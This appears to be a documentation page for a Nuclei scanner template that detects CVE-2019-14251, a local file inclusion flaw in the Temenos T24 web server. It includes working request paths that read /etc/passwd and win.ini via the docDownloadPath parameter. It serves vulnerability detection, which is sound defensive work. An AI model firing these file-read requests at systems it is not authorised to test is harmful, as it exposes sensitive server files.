Skip to content
Nuclei Templates

T24 Web Server - Local File Inclusion

ID: CVE-2019-14251

Severity: high

Author: 0x_Akoko

Tags: cve,cve2019,temenos,lfi,unauth

Description

Section titled “Description”

T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server.

YAML Source

Section titled “YAML Source”
id: CVE-2019-14251


info:
  name: T24 Web Server - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the T24 Web Server.
  reference:
    - https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt
    - https://vuldb.com/?id.146815
    - https://nvd.nist.gov/vuln/detail/CVE-2019-14251
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-14251
    cwe-id: CWE-22
    epss-score: 0.02152
    epss-percentile: 0.89306
    cpe: cpe:2.3:a:temenos:t24:r15.01:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: temenos
    product: t24
  tags: cve,cve2019,temenos,lfi,unauth


http:
  - method: GET
    path:
      - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd"
      - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "for 16-bit app support"
        condition: or


      - type: status
        status:
          - 200
# digest: 4a0a0047304502202ed43d35e9ca05edd8a5d95020f44d50dfb54da8186c174a7211afec144d80e0022100be9b0c7b37ce982fb92d8f8196bfdfd1895e2d0352353af063a93b56e118adf7:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-14251.yaml"

View on Github